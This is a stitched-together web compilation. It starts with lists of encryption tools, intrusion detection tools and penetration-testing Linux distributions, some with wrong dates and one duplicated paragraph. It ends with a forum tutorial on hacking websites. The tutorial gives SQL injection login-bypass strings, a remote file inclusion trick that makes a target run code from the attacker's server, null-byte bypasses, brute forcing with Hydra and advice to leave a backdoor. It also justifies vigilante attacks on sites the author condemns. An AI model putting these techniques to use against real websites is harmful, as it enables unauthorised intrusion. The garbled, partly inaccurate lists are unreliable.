Times are changing and spying has become a common phenomenon everywhere. There have been increasing instances where even the governments have been found to be spying on their citizens from time to time. This is one of the prime reasons why the importance of Encryption has increased manifold. Encryption tools are very important because they keep the data safe by encrypting it so that even if someone accesses the data, they can’t get through the data unless they know how to decrypt the data. These tools use algorithm schemes to encode the data to prevent unauthorized access to the encrypted data.
Some of the popular Encryption Tools will be discussed in this article:-
TrueCrypt is open source encryption tool which can encrypt a partition in the Windows environment (except Windows 8); it’s equipped for creating a virtual encrypted disk in a file. Moreover, it has the capability to encrypt the complete storage device. TrueCrypt can run on different operating systems like Linux, Microsoft Windows, and OSX. TrueCrypt stores the encryption keys in the RAM of the computer.
OpenSSH is the short name for Open Secure Shell and is a free software suite which is used to make your network connections secured. It uses the SSH protocol to provide encrypted communication sessions in a computer network. It was designed originally as an alternative to the Secure Shell Software developed by SSH Communications Security. The tool was designed as a part of the OpenBSD project.
It an open source encryption tool available on both UNIX and Windows operating system. It is a free implementation of SSH (Secure Shell) and Telnet for both Windows as well as UNIX. The beauty of this tool is that it supports many network protocols like Telnet, SCP, rlogin, SSH and raw socket connection. The word PuTTY has no specific meaning, however as in UNIX tradition, tty is a terminal name.
OpenSSL is an open source encryption tool which implements the TLS and SSL protocols. OpenSSL’s core library is written in the C programming language. The fundamental cryptographic functions are implemented by it. OpenSSL versions are available for operating systems like UNIX, Solaris, Linux and Mac OS X. The project was undertaken in 1988 with the objective of inventing free encryption tools for the programs being used on the internet.
Tor is a free encryption tool and has the capability to provide online anonymity as well as censorship resistance. Internal traffic is directed through a free network which consists of more than five thousand relays so that the user’s actual location can be hidden. It is difficult to track the Internet activities like visiting websites and instant messages; the most important goal of this tool is to ensure the personal privacy of the users.
It is an open source tool for the implementation of virtual private network techniques so that secure site-to-site or point-to-point connections using routers or bridges are possible, also remote access is possible. OpenVPN offers the users a secure authentication process by using secret keys which are pre-shared.
Stunnel is a multi-platform open source tool which is used to ensure that both the clients and the servers get secured encrypted connections. This encryption software can operate on a number of operating system platforms like Windows as well as all operating systems which are UNIX-like. Stunnel depends upon a distinct library like SSLeay or OpenSSL to implement the protocols (SSL or TLS)
KeePass is an open source as well as a free password management tool for the Microsoft Windows as well as unofficial ports for operating systems such as iOS, Linux, Android, Mac OS X and Windows Phone. All the usernames, passwords, and all other fields are stored by KeePass in a secured encrypted database. This database, in turn, is protected by a single password.
Intrusion Detection System And The IDS Tools
An Intrusion Detection System is a software application or a device which is equipped to do network or system monitoring activities for any malicious threats and sends reports to the management station. Intrusion detection tools can help in identifying potential threats which can be dangerous for the system or the network.
It is an open source Network Intrusion System as well as a Network Intrusion Prevention System which is free for all to use. It was created in 1988 by Martin Roesch. It has the capability to perform packet logging and analysis of real-time traffic on networks which are using the internet protocol.
NetCop is an advanced intrusion detection system which is available practically everywhere. NetCop makes use of a specific method to classify the spyware. This is because there are several software programs which intrude your privacy and which have a different kind of capabilities. NetCop gives a distinct threat level to each program, thus classifying the threats.
There are numerous professionals who aspire to have a career as ethical hackers. Hacking is not an easy task as it requires great insight about technology and programming. There are specific operating systems as well that are specially designed for the hackers to use. These operating systems have preloaded tools and technologies that hackers can utilize to hack. This article offers a detailed overview of various operating systems that are built keeping hacking in mind. All these operating systems are unique from each other and have proved to be a great resource for the hackers around the world.
This operating system is built keeping the savviest security personnel in mind as the audience. This is also a useful tool even for the early newcomers in the information security field. It offers a quick and easy way to find and also update the largest database available for the security tools collection till date.
This is a creation of the makers of BackTrack. This is regarded as the most versatile and advanced penetration testing distribution ever created. The documentation of the software is built in an easy format to make it the most user-friendly. It is one of the must-have tools for ethical hackers that is making a buzz in the market.
Security Enhanced Linux or SELinux is an upstream repository that is used for various userland tools and libraries. There are various capabilities like policy compilation, policy management and policy development which are incorporated in this utility tool along with SELinux services and utilities. The user can get the software as a tested release or from the development repository.
The website of Knoppix offers a free open source live Linux CD. The CD and DVD that is available contain the latest and recent updated Linux software along with desktop environments. This is one of the best tools for the beginners and includes programs like OpenOffice.org, Mozilla, Konqueror, Apache, MySQL and PHP.
It is a Linux distribution that is based on Ubuntu. If you want to perform security assessment and penetration tests, this software is the one that you should have in your repository. It proactively protects the IT infrastructure. It has the capability to simplify the complexity of your IT infrastructure with ease as well.
It is security focused live CD that is created based on Gentoo. It has a large number of customized tools and kernels including a hardened kernel consisting of aufs patches. It can backport Wi-Fi stack from the latest kernel release that is stable as well. There are development tools in Pentoo that have Cuda/OPENCL cracking.
If you are looking for a distro to be used in penetration testing and cyber forensic investigation, then Matriux Krypton is the name that you can trust. This is a Debian based GNU/Linux security distribution. It has more than 340 powerful tools for penetration testing and forensics; additionally, it contains custom kernel 3.9.4.
This is regarded as the specialist tool that is specifically designed for security auditing and penetration testing. It is a reliable, stable and powerful tool to be used for this purpose and is based on the current Ubuntu Linux distribution. It is a free and open source system that you can download from the website.
It is free and open source penetration testing distribution available over the internet. It is based on Ubuntu 10.10, which is designed specifically for the information security training students and professional. It is fast and stable yet a powerful tool that works perfectly for you. This software is a recommendation from most of the users.
It is free and open source penetration testing distribution available over the internet. It is based on Ubuntu 10.10, which is designed specifically for information security, training students and professionals. It is fast and stable, yet a powerful tool that works perfectly for you. This software is a recommendation from most of the users.
It is a live Linux environment that is designed in such a way that it functions as a web pen testing environment. The software CD contains tools and programs that are open source and free. The tool selection is based on the ones that the company themselves use for security of their IT infrastructure.
It's a great pen testing distro comprising of some innovative pen testing tools. The software uses Fluxbox and is built using Debian Squeeze. One of its popular features is its ability to hack old Android based systems.
It is an Italian GNU/Linux live distribution list that was created as a project of Digital Forensic. It offers a complete forensic environment. This environment is organized in such a way that it integrates the existing software tools and software module and finally, throws the result in the form of friendly graphical interface.
Bugtraq
It is one of the most stable and comprehensive distributions. It offers stable and optimal functionalities with the stable manager in real-time. It is based upon 3.2 and 3.4 kernel Generic that is available in both 32 and 64 Bits. Bugtraq has a wide range of tools in various branches of the kernel. The features of the distribution vary as per your desktop environment
DEFT is a distribution that is created for computer forensics. It can run in a live stream on the system without corrupting the device. The system is based on GNU/Linux and the user can run this live using CD/DVD or USB pen drive. DEFT is now paired with DART, which is a forensic system.
There are various versions of Helix released by e-fense that are useful for both home and business use. The Helix3 Enterprise is a cyber-security solution offered by this organization that provides an incident response. It throws live response and acquires volatile data. Helix3 Pro is the newest version in the block of Helix family products.
Hello partners, first of all I would like to thank all those who have sent me positive feedback about my posts, to say that I'm always willing to learn and teach. I'm also open to answer the appropriate questions.
Second i want to say sorry for the series i left in stand by mode, as soon as i get time i will return them, lastly i wanna wish happy new year and happy hacking for you all.
How to Hack a Website?
We all know that hacking is nothing more than the skill of this century. So what does it means? ´
It means that not everyone can get that skill. so you can see how privileged is to know hacking, in other hands it´s just like a sport, some are born with the talent, some have to practice a lot to get the necessary skills.
Why to Hack a Website? Are Not We White-Hat?
Even in case you never had a successful hack before i assume that once you here you already know what is the meaning of the pic above(the picture looks a little scary and more like a black-hat attitude) , the classification of hackers actually does not make a lot of sense, in my opinion there are newbies,hackers,expert hackers and even worse the skids around, even as a white-hat(according to what the world define as white-hat) sometimes you will find yourself in situations where you have to bring an a*hole down because they are running non--human websites like child pornography and etc.
OK! So How to Hack a Website?
There are a bunch of tutorials here on null---byte and around the internet on how to hack a website with a specific tool, in case you want to learn you are in right place, just look around, but today i want to share something that i think it will be very useful for you, take a cup of coffee grab your chair and start to read this, what i m going to show you today is totally different from my other tutorials, instead of showing you how to use these tools, i will guide you on how you can successfully use these tools and tricks to hack any website, based on my experiences.
Below is my list when i want to hack a website
The Reconnaissance
The reason why a lot of newbies and non-professional hackers fail to get a successful hacking is because they don´t want to wait, most of time they want a magic button where they can click and that´s all, but in the reality it does not work like that, the first thing you have to do is a good reconnaissance about your target, for those familiar with the software development is easier to understand what i mean, you can not develop a good software without a good documentation, just like the UML in software industry here is the same, we need info about the target to make our tasks easier.
My Advice on Good Recon
What are the services they are running?
Figure out stuffs like open ports, software and versions on the server, and try to look for the exploit in case there is at least one online, or you can just make your own exploit.
Tools that i recommend for this section are nmap,whatweb and nikto and of course some others made by Mr_Nakup3nda or you.
Did they write the script by themselves?
In case they wrote it by themselves, look for scripts that take user input,scan for directory listing,check the source code,figure out how the website react to abnormal inputs, i often use these inputs:
ADMIN' OR 1=1# when its an admin url like website/admin/loign/
when its a normal login just try those traditional sql injectors like ' OR '1'='1' -- ' OR '1'='1' ({ ' OR '1'='1' /*
, but it does not end here, try to write sql statements on the inputs, do echo back to you, try to execute a command based on the server OS, figure out how the website filter the inputs and try to bypass the filters.
And in case they used someone else's code such as CMS just grab a copy of it and try to find bugs on your own, or find an exploit if they use a exploitable version of the CMS.
The Evil Google
Sometimes i hack websites simply with the help of some crafted google searches, as hacker you must know how to use google to gather info or hack, in case you do not know you can see my tutorial on how to use google to hack
Changing the Source Code
I bet at this point you already know how to see the source code of a webpage using the right click trick, just to remember that scripting languages like php,perl,asp, python and so on run on the server--side, so it means you can not see by right click unless its an open source platform where you can get a copy of it and change the whole code.
Directory Listing
Index browsing can be very useful when trying to find files you normally shouldn't see like password files,files used to administrate the web page, log files, any files where information get stored.
you can also manually check for suspicious urls like that: website.com/logs/ website.com/files/ website.com/sql/ website.com/secret/ you can either make tools that will automatically do it for you, tools like dirbsuter can be very useful for this task.
My Friend robots.txt
Its very important while hacking to have a look at these files, i wont explain the use of robots.txt(just google it), they often lead us to a lot of path where they don´t want robots to see and sometimes they are very sensitive paths.
Remote Files Inclusion
File inclusion vulnerability is a type of vulnerability most often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. Below we have a piece of php code that open a file.
<?php if (!($hfile = fopen("$file", "r")) echo("error cant open the file: $file<br />\n"); ?> This example open the file with the name specified in the user input ($file). That means it opens every file an attacker want to open and if allowurlfopen is ON even remote files. Look for example at this piece of code: Example:
<?php include($dir . "/members.php"); ?>
Just create a file .members.php on your web server and call the script like this: dir=http://www.server.com/
It will execute your file on the target server. Important is just that you have PHP off or the code will get executed on your server.
NULL Bytes
The name of our community can be and is a very popular vulnerabilities in hacking life.
Lets say they have a script that takes filename that it gets and puts ".txt" on the end. So the programmer tries to make sure that only txt files can be opened.
But what about a filename like this: phppage.php It will get to: phppage.php.txt So fopen opens phppage.php.txt or? No! And that is the point. The fopen functions stops after ".php" before the NULL Byte and opens only "phppage.php". So every type of file can be opened. Scripts that allow uploads (but only for a certain file type) are also a potential target for this type of attack.
SQL-Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution, in my personal experience this is the most popular issue you will find on websites, the problem is that some websites put those info in a database and not all filter them.
So when you echoed back, the javascript message is going to be shown. If they are just logged the last part should cause a sql error wich might give us a lot of useful info. You can try the following website.com/users.php?id=1 and add the /'/ website.com/users.php?id=1' if it throws an error bingo, you are there.
Cross-Site Request Forgeries (CSRF) And Command Injection
Code Execution: require() - reads a file and interprets content as PHP code include() - reads a file and interprets content as PHP code eval() - interpret string as PHP code pregreplace() - if it uses the /e modifier it interprets the replacement string as PHP code
Command Execution: exec() - executes command + returns last line of its output passthru() - executes command + returns its output to the remote browser (backticks) - executes command and returns the output in an array shellexec - executes command + returns output as string system() - executes command + returns its output (much the same as passthru()) .can't handle binary data popen() - executes command + connects its output or input stream to a PHP file descriptor
File Disclosure: fopen() - opens a file and associates it with a PHP file descriptor readfile() - reads a file and writes its contents directly to the remote browser file() - reads an entire file into an array filegetcontents() - reads file into a string
Brute Forcing
Sometimes you will try all the methods mentioned above, but some web sites are really secure and there is no easy way to exploit them.
Often this doesn't stop us from hacking them, they might have open ports running some services such as, ftp, telnet and so on, try to brute force it and get the password, Hydra is another amazing tool for this kind of tasks.
Physical Access
If you have a physical access to the server you get everything in your hands, be discrete and leave a backdoor on it and you done.
Other Kind of Attacks You Can Also Perform Are:
Buffer Overflow Heap Overflow Integer Overflow
And the list is long, i just shared what i got now in my mind, you can also add yours in the comments sections... see you very soon in next tutorials.
